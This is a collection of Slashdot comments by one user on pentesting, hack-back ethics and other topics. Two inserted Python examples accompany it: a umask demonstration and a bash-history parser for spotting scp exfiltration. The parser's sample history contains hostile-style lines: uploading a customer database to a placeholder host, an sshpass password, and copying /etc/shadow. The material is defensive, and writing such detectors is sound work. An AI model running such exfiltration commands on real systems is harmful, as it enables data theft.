
Comment: Re: Tricky question (Score 2) 205

by valdezjuan (#49236519) Attached to: Ask Slashdot - Breaking Into Penetration Testing At 30

Sadly this is too true. A lot of the shops out there don't understand mitigating controls or 'we tweaked a configuration so we aren't vulnerable, despite what the banner says, and here's output from us actually using the exploit... see, not vulnerable'. That's one of the major issues I have with PCI: it's far too common for the auditors to not understand the context of the controls, let alone how the network is configured. I remember having to argue with an auditor about how umask and sudo worked.

When we evaluate third-party companies we request the most recent pentest report (depending on the data being shared), and most of what we get back is simply screenshots from some vuln scanner and 'clearly it says Apache, so it must be vulnerable'. I would love for the end customers to be more educated on what the deliverables should be for a pentest.
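
The umask argument the comment mentions is easy to settle by running it. The following is an added example, not code from the commenter: it uses Python's os.umask/os.open/os.mkdir, which make the same kernel requests as the shell's umask, touch and mkdir, to show what mode a new file or directory actually gets under a given umask (the file mode is 0666 with the umask bits cleared, the directory mode 0777 with the umask bits cleared). It assumes a POSIX system with a writable temp directory.

```python
"""Added example (not from the comment above): what umask actually does to a new file or
directory. The kernel creates a file with 0o666 & ~umask and a directory with 0o777 & ~umask;
a umask can only remove permission bits, never grant them, and it has no effect on files that
already exist. Assumes a POSIX system."""
import os
import stat
import tempfile

DEFAULT_CREATE_MODE = {"file": 0o666, "dir": 0o777}


def expected_mode(umask: int, kind: str) -> int:
    """The mode the kernel will assign: the default create mode with the umask bits cleared."""
    return DEFAULT_CREATE_MODE[kind] & ~umask & 0o777


def mode_under_umask(umask: int, kind: str) -> int:
    """Create a file or directory under `umask` and return the permission bits actually on disk."""
    previous = os.umask(umask)          # umask is process-wide, so put it back afterwards
    try:
        with tempfile.TemporaryDirectory() as tmp:
            path = os.path.join(tmp, "probe")
            if kind == "dir":
                os.mkdir(path, 0o777)   # the same request mkdir(1) makes
            else:
                # the same request touch(1) or a shell redirection makes: open(..., O_CREAT, 0o666)
                os.close(os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o666))
            return stat.S_IMODE(os.lstat(path).st_mode)
    finally:
        os.umask(previous)


def umask_table(umasks=(0o022, 0o027, 0o077)):
    """For each umask, the observed and the computed mode of a new file and a new directory."""
    return [
        (umask, kind, mode_under_umask(umask, kind), expected_mode(umask, kind))
        for umask in umasks
        for kind in ("file", "dir")
    ]


if __name__ == "__main__":
    print("umask  kind  observed  computed")
    for umask, kind, observed, computed in umask_table():
        print(f"{umask:04o}   {kind:<4}  {observed:04o}      {computed:04o}")
```

With umask 022 a new file is 644 and a new directory 755; with 027 they are 640 and 750; with 077 they are 600 and 700. This is also where sudo enters the same argument: sudo applies the umask option from sudoers(5), which defaults to 0022 and is combined with the caller's umask unless umask_override is set, so a command run through sudo can create files with a different mode than the same command run directly.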

Comment: Re:NMAP (Score 5, Informative) 205

by valdezjuan (#49236173) Attached to: Ask Slashdot - Breaking Into Penetration Testing At 30

And this is why there are a ton of shitty 'pentesters' out there who seem to mistake running Nessus or nmap scripts for a penetration test. No, it's not 'secret' knowledge and can easily be learned if you want to spend the time, but running Metasploit doesn't make you a pentester.

Like defenders, pentesters generally need to find all the vulnerabilities (sadly, many customers accept the first one, which ends up being a scoping issue) and understand how to mitigate anything that was discovered/exploited. That requires an understanding of protocols, networking, applications, web frameworks, etc. I have found that the best tend to have the capacity to think maliciously. IMO, that is a critical skill. I have seen far too many people who just don't understand why anyone would want to abuse a protocol, which makes them substandard pentesters.

As for the original question, there are plenty of tools out there that can help you learn: Metasploitable, WebGoat, Kali, SamuraiWTF (disclosure: I am good friends with the lead for that), ZAP, Burp Suite (Pro is great and super reasonable). If you have corporate funding, there are some decent trainings out there; Offensive Security has their classes (and certs; I have heard mixed results). There is also SANS, which I have been increasingly disappointed with, but if you want a bunch of knowledge shoved in your head (at a pretty high dollar cost), they tend to do it. Also, some drift more towards network pentesting or application; personally, I think people should be versed in both (leveraging a remote code execution bug in a webserver is great unless you have no clue what to do within the OS).

For cheaper options there are a bunch of books that can teach you a ton of 'tips and tricks' around pentesting (The Web Application Hacker's Handbook, 2nd Edition is particularly good). Having a solid background as a sysadmin makes it much easier IMO (my background is similar), since you are most likely familiar with troubleshooting, networking, multiple OSes and what not.

Comment: Somewhat Related (Score 2) 320

by valdezjuan (#40357811) Attached to: Hacked Companies Fight Back With Controversial Steps

Say you work for a company which gets compromised and data is exfiltrated out of the network to a known source (the attacker used scp, so the IP address, username and password are left within bash history or some other bash log). You find it within minutes or before the scp is completed. How do people feel about logging into the machine the data is being exfiltrated to and erasing it from the remote server?
Even if the 3rd-party box is one they popped and not the attacker's true machine, you're not damaging the machine, network, etc., you are just removing 'unauthorized data' (granted, it may be a very fine line).
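
Before anyone logs into the remote box, the first step in the scenario above is pulling the destination out of the history file. The following is an added example, not the commenter's code: a small parser that walks a bash-style history, picks out scp commands, works out the direction (a push to user@host:path is the exfiltration case), the host, port and remote path, and notices an sshpass -p wrapper, which is the usual way a password ends up in history. The history lines are constructed for the example and the addresses are RFC 5737 TEST-NET ranges; bash's optional '#<epoch>' timestamp lines are skipped.

```python
"""Added example (not part of the comment above): list scp transfers found in a shell history
file so a responder can see where data went, in which direction, and whether a password was
left behind. The sample history is constructed; the addresses are TEST-NET ranges."""
import re
import shlex
from typing import List, Optional, Tuple

# user@host:path, with the host possibly bracketed for IPv6; a local path has no ':' for scp
REMOTE = re.compile(r"^(?:(?P<user>[^@:]+)@)?(?P<host>\[[^\]]+\]|[^:]+):(?P<path>.*)$")
SCP_OPTS_WITH_ARG = {"-P", "-i", "-o", "-c", "-F", "-l", "-S", "-J"}
SSHPASS_OPTS_WITH_ARG = {"-p", "-f", "-d", "-P"}


def _strip_sshpass(argv: List[str]) -> Tuple[List[str], Optional[str]]:
    """Peel a leading 'sshpass ...' wrapper off argv; return (remaining argv, password or None)."""
    if not argv or argv[0] != "sshpass":
        return argv, None
    password, i = None, 1
    while i < len(argv) and argv[i].startswith("-"):
        opt = argv[i]
        if opt in SSHPASS_OPTS_WITH_ARG:
            if opt == "-p" and i + 1 < len(argv):
                password = argv[i + 1]
            i += 2
        elif opt.startswith("-p") and len(opt) > 2:   # the joined '-pSecret' form
            password = opt[2:]
            i += 1
        else:
            i += 1                                    # -e, -v and similar flags
    return argv[i:], password


def parse_scp(cmdline: str) -> Optional[dict]:
    """Parse one history line; return a transfer record for scp commands, None otherwise."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: not worth guessing
        return None
    argv, password = _strip_sshpass(argv)
    if not argv or argv[0] != "scp":
        return None
    port, operands, i = None, [], 1
    while i < len(argv):
        a = argv[i]
        if a in SCP_OPTS_WITH_ARG:
            if a == "-P" and i + 1 < len(argv):
                port = argv[i + 1]
            i += 2
        elif a.startswith("-"):
            i += 1              # boolean flags such as -r, -q, -C
        else:
            operands.append(a)
            i += 1
    if len(operands) < 2:
        return None
    target, sources = operands[-1], operands[:-1]
    m = REMOTE.match(target)
    if m:                       # copy *to* a remote host: the exfiltration case
        direction, local = "upload", sources
    else:                       # copy *from* a remote host
        remote = [r for r in map(REMOTE.match, sources) if r]
        if not remote:
            return None         # local-to-local copy, nothing left the box
        m, direction, local = remote[0], "download", [target]
    return {
        "direction": direction,
        "user": m.group("user"),
        "host": m.group("host"),
        "port": port or "22",
        "remote_path": m.group("path"),
        "local_paths": local,
        "password": password,
        "command": cmdline,
    }


def parse_history(text: str) -> List[dict]:
    """Walk a history file; skip blanks and HISTTIMEFORMAT '#<epoch>' lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            rec = parse_scp(line)
            if rec:
                records.append(rec)
    return records


def exfil_destinations(text: str) -> List[dict]:
    """Only the transfers that pushed data off the host."""
    return [r for r in parse_history(text) if r["direction"] == "upload"]


# Constructed sample history (not real data); addresses are RFC 5737 TEST-NET ranges.
SAMPLE_HISTORY = """\
#1620000000
cd /var/lib/app
#1620000042
tar czf /tmp/.x.tgz customers.db
#1620000060
scp -P 2222 -i /tmp/.k /tmp/.x.tgz deploy@203.0.113.7:/var/tmp/.x.tgz
#1620000090
sshpass -p 'Hunter2!' scp -r /var/lib/app/exports backup@198.51.100.23:/srv/in/
#1620000120
scp admin@192.0.2.5:/etc/shadow /tmp/shadow
#1620000130
rm -f /tmp/.x.tgz
"""

if __name__ == "__main__":
    for r in exfil_destinations(SAMPLE_HISTORY):
        creds = f"  password={r['password']!r}" if r["password"] else ""
        print(f"{r['user']}@{r['host']}:{r['port']}{r['remote_path']} <- {', '.join(r['local_paths'])}{creds}")
```

The sample gives two pushes off the host (to 203.0.113.7 on port 2222 and to 198.51.100.23 with the sshpass password) and one pull of /etc/shadow, which is reported as a download rather than an exfil destination. History is only written when the shell exits cleanly and is trivial for an attacker to disable or clear, so treat a hit as a lead to confirm against auth logs or network captures, not as the full record.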

Comment: Perhaps it would have been useful (Score 1) 574

by valdezjuan (#37758308) Attached to: No Tab Relocation Coming For Chrome

We have other venues such as the chromium-discuss mailing list and our feedback forums where it is appropriate to share your opinions. The forums are a place where we are set up to track user feedback and surface the most critical issues to the team without impacting the productivity of us developers who are busy trying to make Chrome work better.

Maybe it would have been useful for pkasting@chromium.org to actually link to the forums (perhaps one specifically for UI/Design issues...) or the mailing list instead of just the slightly snarky comments.

Comment: Re:It's legal for foreign money to be spent lobbyi (Score 2, Interesting) 183

by valdezjuan (#32480506) Attached to: Plotting a Coup In the Internet Age

I think the greater point is that corruption doesn't always look like corruption. Other countries have helped mitigate this problem, but I seriously doubt the public knows about even a fraction of how often this happens on a global scale. Especially given how many countries are not open books when it comes to these sorts of things. Not to mention the rampant corruption organized crime helps create. While a bribe is always a bribe, a bribe doesn't always look like one.

The companies that offer bribes also need to be punished for doing so. The US enacted the Foreign Corrupt Practices Act (http://www.justice.gov/criminal/fraud/fcpa/) to combat this problem but few companies ever get more than a slap on the wrist and a wink & nod. Both sides need to realize that offering or accepting a bribe is something that can cost them more than just a few dollars (or whatever the currency).

Now for the obligatory wiki link: http://en.wikipedia.org/wiki/Political_corruption
The global costs are quite large.

Comment: Re:Since customers can override the system.... (Score 2, Interesting) 393

by valdezjuan (#31964640) Attached to: Arizona Trialing System That Lets Utility System Control Home A/Cs

Just thinking about this briefly, I can think of at least one concern (though not directly related to privacy). Power companies (at least in the US) have shown that they are unable to secure their infrastructure. So allowing them to 'control' your settings *might* be allowing an attacker to do the same (or worse).
